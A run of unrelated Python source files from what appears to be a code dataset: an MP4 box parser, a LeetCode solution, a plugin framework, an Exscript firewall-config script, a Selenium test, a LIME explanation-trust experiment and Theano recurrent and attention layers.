self._cache = self._file.read(self._cache_read_size)
self._cache_offset = offset
@property
def _cache_size(self):
if self._cache:
return len(self._cache)
return 0
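# Illustrative FileCache usage (mirrors the __main__ block at the end of this file):
#     with open('ted.mp4', 'rb') as f:
#         data = FileCache(f)
#         data.peek(8)          # read ahead without moving the current offset
#         mp4 = BoxRoot(data)   # parse the complete box tree through the cache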
class BoxMetaClass(type):
def __init__(cls, name, bases, dct):
if hasattr(cls, 'boxtype'):
cls.box_classes[cls.boxtype] = cls
super(BoxMetaClass, cls).__init__(name, bases, dct)
class Box(object):
box_classes = {} # key value pair of box type name and corresponding subclass
# filled by metaclass
__metaclass__ = BoxMetaClass
direct_children = False
def __init__(self, data, parent):
self.box_offset = data.tell()
self.parent = parent
self.size, = struct.unpack('>I', data.read(4))
self.type = data.read(4)
self.next = None
self.children = []
if self.size == 1:
# 64-bit size
self.size, = struct.unpack('>Q', data.read(8))
elif self.size == 0:
# to the end of file
pass
else:
pass
self.body_offset = data.tell()
self._parse(data)
def _parse(self, data):
if self.direct_children:
self._parse_child(data)
else:
data.seek(self.box_offset+self.size)
def _parse_child(self, data):
while True:
if self.parent and self.parent.end_offset and data.tell() >= self.parent.end_offset:
return
if self.end_offset and data.tell() >= self.end_offset:
return
try:
child = Box.factory(data, self)
except Exception:
print traceback.format_exc()
return
if child:
self.children.append(child)
else:
return
def iter_child(self, deep=False):
for child in self.children:
yield child
if deep:
for box in child.iter_child(deep=True):
yield box
@property
def end_offset(self):
if self.size:
return self.box_offset + self.size
else:
return 0
def find_children(self, box_type, deep=False, only_first=False):
children = []
for child in self.iter_child(deep=deep):
if child.type == box_type:
if only_first:
return child
else:
children.append(child)
return children
@classmethod
def factory(cls, data, parent):
boxtype = data.peek(8)[4:8]
if len(boxtype) == 0:
return None
if boxtype in cls.box_classes:
return cls.box_classes[boxtype](data, parent)
else:
return cls(data, parent)
class BoxRoot(Box):
boxtype = 'ROOT'
direct_children = True
def __init__(self, data):
self.box_offset = data.tell()
self.body_offset = self.box_offset
self.parent = None
self.size = 0
self.type = self.boxtype
self.children = []
self._parse(data)
class BoxMoov(Box):
boxtype = 'moov'
def _parse(self, data):
self._parse_child(data)
class BoxTrak(Box):
boxtype = 'trak'
direct_children = True
class BoxMdia(Box):
boxtype = 'mdia'
direct_children = True
class BoxMdhd(Box):
boxtype = 'mdhd'
def _parse(self, data):
self.version, = struct.unpack('>B', data.read(1))
self.flag = data.read(3)
if self.version == 0:
self.creation_time, = struct.unpack('>I', data.read(4))
self.modification_time, = struct.unpack('>I', data.read(4))
self.timescale, = struct.unpack('>I', data.read(4))
self.duration, = struct.unpack('>I', data.read(4))
else:
self.creation_time, = struct.unpack('>Q', data.read(8))
self.modification_time, = struct.unpack('>Q', data.read(8))
self.timescale, = struct.unpack('>I', data.read(4))
self.duration, = struct.unpack('>Q', data.read(8))
data.forward(4)
class BoxMinf(Box):
boxtype = 'minf'
direct_children = True
class BoxStbl(Box):
boxtype = 'stbl'
direct_children = True
class BoxStts(Box):
boxtype = 'stts'
def _parse(self, data):
self.version = data.read(1)
self.flag = data.read(3)
self.entry_count, = struct.unpack('>I', data.read(4))
self._entries = data.read(self.entry_count*8)
def iter_time_to_sample(self):
offset = 0
end_offset = self.entry_count*8
while offset + 8 <= end_offset:
yield struct.unpack('>I', self._entries[offset:offset+4])[0], struct.unpack('>I', self._entries[offset+4:offset+8])[0]
offset += 8
def sample_time(self, sample):
accum_samples = 0
accum_time = 0
for sample_count, sample_delta in self.iter_time_to_sample():
if sample < accum_samples + sample_count:
return accum_time + (sample - accum_samples)*sample_delta
accum_samples += sample_count
accum_time += sample_count*sample_delta
class BoxStss(Box):
# return sample starts from 0 instead of from 1
boxtype = 'stss'
def _parse(self, data):
self.version = data.read(1)
self.flag = data.read(3)
self.entry_count, = struct.unpack('>I', data.read(4))
self._entries = data.read(self.entry_count*4)
def sync_sample(self, index):
if index+1 > self.entry_count:
raise Exception('stss index {} too large'.format(index))
return struct.unpack('>I', self._entries[index*4:index*4+4])[0] - 1
def iter_sync_sample(self):
offset = 0
end_offset = self.entry_count*4
while offset + 4 <= end_offset:
yield struct.unpack('>I', self._entries[offset:offset+4])[0] - 1
offset += 4
if __name__ == '__main__':
def print_all_children(box, prefix=''):
for child in box.iter_child():
print prefix, child.type
print_all_children(child, prefix+' ')
with open('ted.mp4', 'rb') as f:
data = FileCache(f)
mp4 = BoxRoot(data)
print_all_children(mp4)
print '\nstss data:'
for trak in mp4.find_children('trak', deep=True):
stts = trak.find_children('stts', deep=True, only_first=True)
stss = trak.find_children('stss', deep=True, only_first=True)
mdhd = trak.find_children('mdhd', deep=True, only_first=True)
if stts and stss:
for sync_sample in stss.iter_sync_sample():
print sync_sample, stts.sample_time(sync_sample), float(stts.sample_time(sync_sample))/mdhd.timescale
| gpl-3.0 | -415,757,000,598,475,300 | 29.241722 | 130 | 0.545604 | false |
Shuailong/Leetcode | solutions/bulb-switcher.py | 1 | 1128 | #!/usr/bin/env python
# encoding: utf-8
"""
bulb-switcher.py
Created by Shuailong on 2015-12-19.
https://leetcode.com/problems/bulb-switcher.
"""
'''Key insight: find the pattern and rewrite the solution accordingly.'''
from math import floor,sqrt
class Solution1(object):
'''Too time consuming'''
def factors(self,n):
'''
How many factors does the integer n have?
'''
if n == 1:
return 1
count = 0
for i in range(2, n):
if n % i == 0:
count += 1
return count+2
def bulbSwitch(self, n):
"""
:type n: int
:rtype: int
"""
count = 0
for i in range(1, n+1):
if self.factors(i) % 2 == 1:
count += 1
return count
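# A bulb ends up toggled once for every divisor of its index, so it stays on only
# when the index has an odd number of divisors, i.e. when it is a perfect square.
# The number of lit bulbs after n rounds is therefore floor(sqrt(n)), which the
# Solution class below returns directly.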
class Solution(object):
def bulbSwitch(self,n):
"""
:type n: int
:rtype: int
"""
return int(floor(sqrt(n)))
def main():
solution = Solution()
solution1 = Solution1()
for n in range(1,20):
print n, solution.bulbSwitch(n)
if __name__ == '__main__':
main()
| mit | -5,968,391,800,125,050,000 | 16.369231 | 49 | 0.489362 | false |
kif/UPBL09a | dahu/plugin.py | 1 | 5115 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
"""
Data Analysis Highly tailored for Upbl09a
"""
from __future__ import with_statement, print_function, absolute_import, division
__authors__ = ["Jérôme Kieffer"]
__contact__ = "[email protected]"
__license__ = "MIT"
__copyright__ = "European Synchrotron Radiation Facility, Grenoble, France"
__date__ = "31/10/2018"
__status__ = "production"
from .factory import plugin_factory, register
from .utils import fully_qualified_name, get_workdir
import os
import logging
import cProfile
logger = logging.getLogger("dahu.plugin")
class Plugin(object):
"""
A plugin is instanciated
* Gets its input parameters as a dictionary from the setup method
* Performs some work in the process
* Sets the result as output attribute, should be a dictionary
* The process can be an infinite loop or a server which can be aborted using the abort method
"""
DEFAULT_SET_UP = "setup" # name of the method used to set-up the plugin (close connection, files)
DEFAULT_PROCESS = "process" # specify how to run the default processing
DEFAULT_TEAR_DOWN = "teardown" # name of the method used to tear-down the plugin (close connection, files)
DEFAULT_ABORT = "abort" # name of the method used to abort the plugin (if any. Tear_Down will be called)
def __init__(self):
"""
We assume an empty constructor
"""
self.input = {}
self.output = {}
self._logging = [] # stores the logging information to send back
self.is_aborted = False
self.__profiler = None
def get_name(self):
return self.__class__.__name__
def setup(self, kwargs=None):
"""
This is the second constructor to setup
input variables and possibly initialize
some objects
"""
if kwargs is not None:
self.input.update(kwargs)
if self.input.get("do_profiling"):
self.__profiler = cProfile.Profile()
self.__profiler.enable()
def process(self):
"""
main processing of the plugin
"""
pass
def teardown(self):
"""
method used to tear-down the plugin (close connection, files)
This is always run, even if process fails
"""
self.output["logging"] = self._logging
if self.input.get("do_profiling"):
self.__profiler.disable()
name = "%05i_%s.%s.profile" % (self.input.get("job_id", 0), self.__class__.__module__, self.__class__.__name__)
profile_file = os.path.join(get_workdir(), name)
self.log_error("Profiling information in %s" % profile_file, do_raise=False)
self.__profiler.dump_stats(profile_file)
def get_info(self):
"""
"""
return os.linesep.join(self._logging)
def abort(self):
"""
Method called to stop a server process
"""
self.is_aborted = True
def log_error(self, txt, do_raise=True):
"""
Way to log errors and raise error
"""
if do_raise:
err = "ERROR in %s: %s" % (self.get_name(), txt)
logger.error(err)
else:
err = "Warning in %s: %s" % (self.get_name(), txt)
logger.warning(err)
self._logging.append(err)
if do_raise:
raise RuntimeError(err)
def log_warning(self, txt):
"""
Way to log warning
"""
err = "Warning in %s: %s" % (self.get_name(), txt)
logger.warning(err)
self._logging.append(err)
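# Illustrative sketch (annotation, not part of the original module): a minimal Plugin subclass showing
# the setup/process/teardown lifecycle described in the Plugin docstring above. The class name and the
# "x"/"result" keys are invented for the example.
class _ExampleDoubler(Plugin):
    def process(self):
        # read an input parameter provided through setup() and publish a result
        self.output["result"] = self.input.get("x", 0) * 2
# typical driver code: p = _ExampleDoubler(); p.setup({"x": 21}); p.process(); p.teardown()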
class PluginFromFunction(Plugin):
"""
Template class to build a plugin from a function
"""
def __init__(self):
"""
:param funct: function to be wrapped
"""
Plugin.__init__(self)
def __call__(self, **kwargs):
"""
Behaves like a normal function: for debugging
"""
self.input.update(kwargs)
self.process()
self.teardown()
return self.output["result"]
def process(self):
if self.input is None:
print("PluginFromFunction.process: self.input is None !!! %s", self.input)
else:
funct_input = self.input.copy()
if "job_id" in funct_input:
funct_input.pop("job_id")
if "plugin_name" in funct_input:
funct_input.pop("plugin_name")
self.output["result"] = self.function(**funct_input)
def plugin_from_function(function):
"""
    Create a plugin class from a given function and register it with the plugin factory.
:param function: any function
:return: plugin name to be used by the plugin_factory to get an instance
"""
logger.debug("creating plugin from function %s" % function.__name__)
class_name = function.__module__ + "." + function.__name__
klass = type(class_name, (PluginFromFunction,),
{'function': staticmethod(function),
"__doc__": function.__doc__})
plugin_factory.register(klass, class_name)
return class_name
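# Usage sketch (annotation, not in the original file):
#   name = plugin_from_function(my_function)   # 'my_function' is any plain function (placeholder name)
#   # 'name' is the qualified class name registered with plugin_factory, from which an instance of the
#   # generated PluginFromFunction subclass can later be obtained.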
| gpl-2.0 | -6,533,337,136,667,705,000 | 29.987879 | 123 | 0.584588 | false |
loopback1/scripts | code/python/exscript_asa_config.py | 1 | 1247 | #!/usr/bin/env python
import Exscript.util.file as euf
import Exscript.util.start as eus
import Exscript.util.match as eum
# import Exscript.protocols.drivers
from Exscript import Account
hosts = euf.get_hosts_from_file('hosts_mass_config.txt')
def mass_commands(job, hosts, conn):
# conn.send("enable\r")
# conn.auto_app_authorize(accounts)
conn.execute('conf t')
mass_commands_file = 'mass_commands.txt'
with open(mass_commands_file, 'r') as f:
for line in f:
conn.execute(line)
# conn.execute('show run')
# get hostname of the device
# hostname = eum.first_match(conn, r'^hostname\s(.*)$')
# cfg_file = '/home/xxxx/python/configs/firewalls/' + hostname.strip() + '.cfg'
# config = conn.response.splitlines()
# some clean up
# for i in range(3):
# config.pop(i)
# config.pop(-0)
# config.pop(-1)
# write config to file
# with open(cfg_file, 'w') as f:
# for line in config:
# f.write(line + '\n')
# eus.start(accounts, hosts, mass_commands, max_threads = 8)
eus.quickstart(hosts, mass_commands, max_threads=8)
| unlicense | -8,519,244,133,162,871,000 | 30.974359 | 91 | 0.578188 | false |
MikeTheGreat/GLT | Tests/SeleniumTest.py | 1 | 1553 | """Testing the PyUnit / Selenium (WebDriver for Chrome) integration"""
import unittest
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0
from selenium.webdriver.support import expected_conditions as EC # available since 2.26.0
class TestSelenium(unittest.TestCase):
    """Apparently PyUnit looks for classes that inherit from TestCase."""
def test_chrome(self):
"""Can I get chrome to work via WebDriver?"""
# Create a new instance of the Chrome driver
driver = webdriver.Chrome()
# go to the google home page
driver.get("http://www.google.com")
# the page is ajaxy so the title is originally this:
print driver.title
# find the element that's name attribute is q (the google search box)
input_element = driver.find_element_by_name("q")
# type in the search
input_element.send_keys("cheese!")
# submit the form (although google automatically searches now without submitting)
input_element.submit()
try:
# we have to wait for the page to refresh, the last thing that seems
# to be updated is the title
WebDriverWait(driver, 10).until(EC.title_contains("cheese!"))
# You should see "cheese! - Google Search"
print driver.title
if driver.title != "cheese! - Google Search":
self.fail()
finally:
driver.quit()
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | -2,201,033,008,625,944,800 | 32.76087 | 89 | 0.637476 | false |
marcotcr/lime-experiments | data_trusting.py | 1 | 7483 | import sys
import copy
import os
import numpy as np
import scipy as sp
import json
import random
import sklearn
from sklearn import ensemble
# explicit imports for names used below; some may also be re-exported by the star import from load_datasets
from sklearn import linear_model
from sklearn import cross_validation
from sklearn.feature_extraction.text import CountVectorizer
from sklearn import svm
from sklearn import tree
from sklearn import neighbors
import pickle
import explainers
import parzen_windows
import embedding_forest
from load_datasets import *
import argparse
import collections
def get_classifier(name, vectorizer):
if name == 'logreg':
return linear_model.LogisticRegression(fit_intercept=True)
if name == 'random_forest':
return ensemble.RandomForestClassifier(n_estimators=1000, random_state=1, max_depth=5, n_jobs=10)
if name == 'svm':
return svm.SVC(probability=True, kernel='rbf', C=10,gamma=0.001)
if name == 'tree':
return tree.DecisionTreeClassifier(random_state=1)
if name == 'neighbors':
return neighbors.KNeighborsClassifier()
if name == 'embforest':
return embedding_forest.EmbeddingForest(vectorizer)
def main():
parser = argparse.ArgumentParser(description='Evaluate some explanations')
parser.add_argument('--dataset', '-d', type=str, required=True,help='dataset name')
parser.add_argument('--algorithm', '-a', type=str, required=True, help='algorithm_name')
parser.add_argument('--num_features', '-k', type=int, required=True, help='num features')
parser.add_argument('--percent_untrustworthy', '-u', type=float, required=True, help='percentage of untrustworthy features. like 0.1')
parser.add_argument('--num_rounds', '-r', type=int, required=True, help='num rounds')
args = parser.parse_args()
dataset = args.dataset
train_data, train_labels, test_data, test_labels, class_names = LoadDataset(dataset)
vectorizer = CountVectorizer(lowercase=False, binary=True)
train_vectors = vectorizer.fit_transform(train_data)
test_vectors = vectorizer.transform(test_data)
terms = np.array(list(vectorizer.vocabulary_.keys()))
indices = np.array(list(vectorizer.vocabulary_.values()))
inverse_vocabulary = terms[np.argsort(indices)]
np.random.seed(1)
classifier = get_classifier(args.algorithm, vectorizer)
classifier.fit(train_vectors, train_labels)
np.random.seed(1)
untrustworthy_rounds = []
all_features = range(train_vectors.shape[1])
num_untrustworthy = int(train_vectors.shape[1] * args.percent_untrustworthy)
for _ in range(args.num_rounds):
untrustworthy_rounds.append(np.random.choice(all_features, num_untrustworthy, replace=False))
rho = 25
kernel = lambda d: np.sqrt(np.exp(-(d**2) / rho ** 2))
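    # Annotation: exponential similarity kernel used by the local explainer to weight perturbed
    # samples by their distance d from the instance being explained; rho is the kernel width
    # (larger rho keeps more distant samples influential).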
LIME = explainers.GeneralizedLocalExplainer(kernel, explainers.data_labels_distances_mapping_text, num_samples=15000, return_mean=True, verbose=False, return_mapped=True)
parzen = parzen_windows.ParzenWindowClassifier()
cv_preds = sklearn.cross_validation.cross_val_predict(classifier, train_vectors, train_labels, cv=5)
parzen.fit(train_vectors, cv_preds)
sigmas = {'multi_polarity_electronics': {'neighbors': 0.75, 'svm': 10.0, 'tree': 0.5,
'logreg': 0.5, 'random_forest': 0.5, 'embforest': 0.75},
'multi_polarity_kitchen': {'neighbors': 1.0, 'svm': 6.0, 'tree': 0.75,
'logreg': 0.25, 'random_forest': 6.0, 'embforest': 1.0},
'multi_polarity_dvd': {'neighbors': 0.5, 'svm': 0.75, 'tree': 8.0, 'logreg':
0.75, 'random_forest': 0.5, 'embforest': 5.0}, 'multi_polarity_books':
{'neighbors': 0.5, 'svm': 7.0, 'tree': 2.0, 'logreg': 1.0, 'random_forest':
1.0, 'embforest': 3.0}}
parzen.sigma = sigmas[dataset][args.algorithm]
random = explainers.RandomExplainer()
exps = {}
explainer_names = ['LIME', 'random', 'greedy', 'parzen']
for expl in explainer_names:
exps[expl] = []
predictions = classifier.predict(test_vectors)
predict_probas = classifier.predict_proba(test_vectors)[:,1]
for i in range(test_vectors.shape[0]):
print i
sys.stdout.flush()
exp, mean = LIME.explain_instance(test_vectors[i], 1, classifier.predict_proba, args.num_features)
exps['LIME'].append((exp, mean))
exp = parzen.explain_instance(test_vectors[i], 1, classifier.predict_proba, args.num_features, None)
mean = parzen.predict_proba(test_vectors[i])[1]
exps['parzen'].append((exp, mean))
exp = random.explain_instance(test_vectors[i], 1, None, args.num_features, None)
exps['random'].append(exp)
exp = explainers.explain_greedy_martens(test_vectors[i], predictions[i], classifier.predict_proba, args.num_features)
exps['greedy'].append(exp)
precision = {}
recall = {}
f1 = {}
for name in explainer_names:
precision[name] = []
recall[name] = []
f1[name] = []
flipped_preds_size = []
for untrustworthy in untrustworthy_rounds:
t = test_vectors.copy()
t[:, untrustworthy] = 0
mistrust_idx = np.argwhere(classifier.predict(t) != classifier.predict(test_vectors)).flatten()
print 'Number of suspect predictions', len(mistrust_idx)
shouldnt_trust = set(mistrust_idx)
flipped_preds_size.append(len(shouldnt_trust))
mistrust = collections.defaultdict(lambda:set())
trust = collections.defaultdict(lambda: set())
trust_fn = lambda prev, curr: (prev > 0.5 and curr > 0.5) or (prev <= 0.5 and curr <= 0.5)
trust_fn_all = lambda exp, unt: len([x[0] for x in exp if x[0] in unt]) == 0
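    # Annotation: trust_fn says a prediction can still be trusted if removing the contribution of the
    # untrustworthy features keeps it on the same side of the 0.5 boundary; trust_fn_all (used for the
    # random/greedy explainers) trusts a prediction only if the explanation contains no untrustworthy
    # feature. The gold standard (shouldnt_trust) is whether zeroing those features actually flips the model.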
for i in range(test_vectors.shape[0]):
exp, mean = exps['LIME'][i]
prev_tot = predict_probas[i]
prev_tot2 = sum([x[1] for x in exp]) + mean
tot = prev_tot2 - sum([x[1] for x in exp if x[0] in untrustworthy])
trust['LIME'].add(i) if trust_fn(tot, prev_tot) else mistrust['LIME'].add(i)
exp, mean = exps['parzen'][i]
prev_tot = mean
tot = mean - sum([x[1] for x in exp if x[0] in untrustworthy])
trust['parzen'].add(i) if trust_fn(tot, prev_tot) else mistrust['parzen'].add(i)
exp = exps['random'][i]
trust['random'].add(i) if trust_fn_all(exp, untrustworthy) else mistrust['random'].add(i)
exp = exps['greedy'][i]
trust['greedy'].add(i) if trust_fn_all(exp, untrustworthy) else mistrust['greedy'].add(i)
for expl in explainer_names:
      # switching the definition: here a "positive" is a prediction the explainer says can be trusted
false_positives = set(trust[expl]).intersection(shouldnt_trust)
true_positives = set(trust[expl]).difference(shouldnt_trust)
false_negatives = set(mistrust[expl]).difference(shouldnt_trust)
true_negatives = set(mistrust[expl]).intersection(shouldnt_trust)
try:
prec= len(true_positives) / float(len(true_positives) + len(false_positives))
except:
prec= 0
try:
rec= float(len(true_positives)) / (len(true_positives) + len(false_negatives))
except:
rec= 0
precision[expl].append(prec)
recall[expl].append(rec)
f1z = 2 * (prec * rec) / (prec + rec) if (prec and rec) else 0
f1[expl].append(f1z)
print 'Average number of flipped predictions:', np.mean(flipped_preds_size), '+-', np.std(flipped_preds_size)
print 'Precision:'
for expl in explainer_names:
print expl, np.mean(precision[expl]), '+-', np.std(precision[expl]), 'pvalue', sp.stats.ttest_ind(precision[expl], precision['LIME'])[1].round(4)
print
print 'Recall:'
for expl in explainer_names:
print expl, np.mean(recall[expl]), '+-', np.std(recall[expl]), 'pvalue', sp.stats.ttest_ind(recall[expl], recall['LIME'])[1].round(4)
print
print 'F1:'
for expl in explainer_names:
print expl, np.mean(f1[expl]), '+-', np.std(f1[expl]), 'pvalue', sp.stats.ttest_ind(f1[expl], f1['LIME'])[1].round(4)
if __name__ == "__main__":
main()
| bsd-2-clause | 4,007,125,213,171,677,700 | 42.254335 | 172 | 0.678338 | false |
chuckgu/Alphabeta | theano/library/Modified_Layers.py | 1 | 23038 | import theano
import theano.tensor as T
import numpy as np
from Initializations import glorot_uniform,zero,alloc_zeros_matrix,glorot_normal,numpy_floatX,orthogonal,one,uniform
import theano.typed_list
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
from Activations import relu,LeakyReLU,tanh,sigmoid,linear,mean,max,softmax,hard_sigmoid
from Recurrent_Layers import Recurrent
from Layers import dropout_layer
class SGRU(Recurrent):
def __init__(self,n_in,n_hidden,n_seg=4,activation='tanh',return_seq=True):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.n_seg=int(n_seg)
self.input= T.tensor3()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.return_seq=return_seq
self.U_z = glorot_uniform((n_hidden,n_hidden))
self.W_z1 = glorot_uniform((n_in,n_hidden/4))
self.b_z1 = zero((n_hidden/4,))
self.W_z2 = glorot_uniform((n_in,n_hidden/4))
self.b_z2 = zero((n_hidden/4,))
self.W_z3 = glorot_uniform((n_in,n_hidden/4))
self.b_z3 = zero((n_hidden/4,))
self.W_z4 = glorot_uniform((n_in,n_hidden/4))
self.b_z4 = zero((n_hidden/4,))
self.U_r = glorot_uniform((n_hidden,n_hidden))
self.W_r1 = glorot_uniform((n_in,n_hidden/4))
self.b_r1 = zero((n_hidden/4,))
self.W_r2 = glorot_uniform((n_in,n_hidden/4))
self.b_r2 = zero((n_hidden/4,))
self.W_r3 = glorot_uniform((n_in,n_hidden/4))
self.b_r3 = zero((n_hidden/4,))
self.W_r4 = glorot_uniform((n_in,n_hidden/4))
self.b_r4 = zero((n_hidden/4,))
self.U_h = glorot_uniform((n_hidden,n_hidden))
self.W_h1 = glorot_uniform((n_in,n_hidden/4))
self.b_h1 = zero((n_hidden/4,))
self.W_h2 = glorot_uniform((n_in,n_hidden/4))
self.b_h2 = zero((n_hidden/4,))
self.W_h3 = glorot_uniform((n_in,n_hidden/4))
self.b_h3 = zero((n_hidden/4,))
self.W_h4 = glorot_uniform((n_in,n_hidden/4))
self.b_h4 = zero((n_hidden/4,))
        # note: the input-to-hidden weights of this segmented GRU are split into four blocks,
        # so all of them (plus the recurrent matrices and biases) are collected as parameters
        self.params = [
        self.U_z, self.W_z1, self.b_z1, self.W_z2, self.b_z2, self.W_z3, self.b_z3, self.W_z4, self.b_z4,
        self.U_r, self.W_r1, self.b_r1, self.W_r2, self.b_r2, self.W_r3, self.b_r3, self.W_r4, self.b_r4,
        self.U_h, self.W_h1, self.b_h1, self.W_h2, self.b_h2, self.W_h3, self.b_h3, self.W_h4, self.b_h4,
        ]
        self.L1 = 0
        self.L2_sqr = T.sum(self.U_z**2) + T.sum(self.U_r**2) + T.sum(self.U_h**2)+\
        T.sum(self.W_z1**2) + T.sum(self.W_z2**2) + T.sum(self.W_z3**2) + T.sum(self.W_z4**2)+\
        T.sum(self.W_r1**2) + T.sum(self.W_r2**2) + T.sum(self.W_r3**2) + T.sum(self.W_r4**2)+\
        T.sum(self.W_h1**2) + T.sum(self.W_h2**2) + T.sum(self.W_h3**2) + T.sum(self.W_h4**2)
def _step(self,
xz_t, xr_t, xh_t, mask_tm1,
h_tm1,
u_z, u_r, u_h):
z = hard_sigmoid(xz_t + T.dot(h_tm1, u_z))
r = hard_sigmoid(xr_t + T.dot(h_tm1, u_r))
hh_t = self.activation(xh_t + T.dot(r * h_tm1, u_h))
h_t = z * h_tm1 + (1 - z) * hh_t
h_t=mask_tm1 * h_t + (1. - mask_tm1) * h_tm1
return h_t
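        # Annotation: the step above is the standard GRU update with masking,
        #   z_t  = hard_sigmoid(W_z x_t + b_z + U_z h_{t-1})
        #   r_t  = hard_sigmoid(W_r x_t + b_r + U_r h_{t-1})
        #   hh_t = activation(W_h x_t + b_h + U_h (r_t * h_{t-1}))   (activation defaults to tanh)
        #   h_t  = z_t * h_{t-1} + (1 - z_t) * hh_t
        # and the mask keeps h_{t-1} unchanged on padded timesteps.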
def get_output(self, train=False, init_state=None):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
x_z = T.concatenate([T.dot(X, self.W_z1) + self.b_z1, T.dot(X, self.W_z2) + self.b_z2,T.dot(X, self.W_z3) + self.b_z3,T.dot(X, self.W_z4) + self.b_z4], axis=-1)
x_r = T.concatenate([T.dot(X, self.W_r1) + self.b_r1, T.dot(X, self.W_r2) + self.b_r2,T.dot(X, self.W_r3) + self.b_r3,T.dot(X, self.W_r4) + self.b_r4], axis=-1)
        x_h = T.concatenate([T.dot(X, self.W_h1) + self.b_h1, T.dot(X, self.W_h2) + self.b_h2,T.dot(X, self.W_h3) + self.b_h3,T.dot(X, self.W_h4) + self.b_h4], axis=-1)
if init_state is None: init_state=T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
h, c = theano.scan(
self._step,
sequences=[x_z, x_r, x_h, padded_mask],
outputs_info=init_state,
non_sequences=[self.U_z, self.U_r, self.U_h])
        if self.return_seq is False: return h[-1]
return h.dimshuffle((1, 0, 2))
class Attention2(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',mode='soft'):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
#self.activation=eval(activation)
self.mode=mode
self.W_h = glorot_uniform((n_in,n_hidden))
self.b_h = zero((n_hidden,))
self.W_c = glorot_uniform((4096,n_hidden))
self.b_c = zero((n_hidden,))
self.W_v = glorot_uniform((n_hidden,n_hidden))
self.W_l = glorot_uniform((n_hidden,n_hidden))
self.W_lh = glorot_uniform((n_hidden,n_hidden))
self.W_vh = glorot_uniform((n_hidden,n_hidden))
self.U_att= orthogonal((n_hidden,1))
self.b_att= zero((1,))
self.params=[self.W_h,self.b_h,self.W_c,self.b_c,self.W_v,self.W_l,self.U_att,self.b_att,self.W_lh,self.W_vh]
self.L1 = 0
self.L2_sqr = 0
def add_input(self, add_input=None):
self.input2=add_input
def _step(self,h_tm1,p_x,p_xm,ctx):
#visual attention
#ctx=dropout_layer(ctx)
v_a=T.exp(ctx+T.dot(h_tm1,self.W_v))
v_a=v_a/v_a.sum(1, keepdims=True)
ctx_p=ctx*v_a
#linguistic attention
l_a=p_x+T.dot(h_tm1,self.W_l)[None,:,:]
l_a=T.dot(l_a,self.U_att)+self.b_att
l_a=T.exp(l_a.reshape((l_a.shape[0],l_a.shape[1])))
l_a=l_a/l_a.sum(0, keepdims=True)
l_a=l_a*p_xm
p_x_p=(p_x*l_a[:,:,None]).sum(0)
h= T.dot(ctx_p,self.W_vh) + T.dot(p_x_p,self.W_lh)
return h
def get_output(self,train=False):
if self.mode is 'soft':
X = self.get_input(train)
padded_mask = self.get_mask().astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0))
p_x = T.dot(X, self.W_h) + self.b_h
ctx = T.dot(self.input2, self.W_c) + self.b_c
ctx=dropout_layer(ctx,0.25)
h, _ = theano.scan(self._step,
#sequences = [X],
outputs_info = T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1),
non_sequences=[p_x,padded_mask,ctx],
n_steps=X.shape[0] )
return h[-1]
class Attention3(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',mode='soft'):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.mode=mode
self.W_h = glorot_uniform((n_in,n_hidden))
self.b_h = zero((n_hidden,))
self.W_c = glorot_uniform((4096,n_hidden))
self.b_c = zero((n_hidden,))
self.W_v = glorot_uniform((n_hidden,n_hidden))
self.params=[self.W_h,self.b_h,self.W_c,self.b_c,self.W_v]
self.L1 = 0
self.L2_sqr = 0
def add_input(self, add_input=None):
self.input2=add_input
def get_output(self,train=False):
if self.mode is 'soft':
X=self.get_input(train)
img=T.dot(self.input2,self.W_c)+self.b_c
output=self.activation(T.dot(X,self.W_h)+self.b_h+img)
output=T.dot(output,self.W_v)
#x_mask=self.x_mask.astype('int8')
e=T.exp(output)
e=e/e.sum(1, keepdims=True)
#e=e*x_mask
output=(img*e)+X
return output
class GRU2(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',return_seq=True):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.return_seq=return_seq
self.W_z = glorot_uniform((n_in,n_hidden))
self.U_z = glorot_uniform((n_hidden,n_hidden))
self.b_z = zero((n_hidden,))
self.W_r = glorot_uniform((n_in,n_hidden))
self.U_r = glorot_uniform((n_hidden,n_hidden))
self.b_r = zero((n_hidden,))
self.W_h = glorot_uniform((n_in,n_hidden))
self.U_h = glorot_uniform((n_hidden,n_hidden))
self.b_h = zero((n_hidden,))
self.W_c = glorot_uniform((4096,n_hidden))
self.b_c = zero((n_hidden,))
self.W_hc=glorot_uniform((n_hidden,n_hidden))
self.params = [
self.W_z, self.U_z, self.b_z,
self.W_r, self.U_r, self.b_r,
self.W_h, self.U_h, self.b_h,
self.W_c, self.b_c#, self.W_hc
]
self.L1 = 0
self.L2_sqr = T.sum(self.W_z**2) + T.sum(self.U_z**2)+\
T.sum(self.W_r**2) + T.sum(self.U_r**2)+\
T.sum(self.W_h**2) + T.sum(self.U_h**2)
def _step(self,
xz_t, xr_t, xh_t, mask_tm1,
h_tm1,
u_z, u_r, u_h, ctx):
ctx=dropout_layer(ctx)
c=ctx#+T.dot(h_tm1,self.W_hc)
z = hard_sigmoid(xz_t + T.dot(h_tm1, u_z)+c)
r = hard_sigmoid(xr_t + T.dot(h_tm1, u_r)+c)
hh_t = self.activation(xh_t + T.dot(r * h_tm1, u_h)+c)
h_t = z * h_tm1 + (1 - z) * hh_t
h_t=mask_tm1 * h_t + (1. - mask_tm1) * h_tm1
return h_t
def add_input(self, add_input=None):
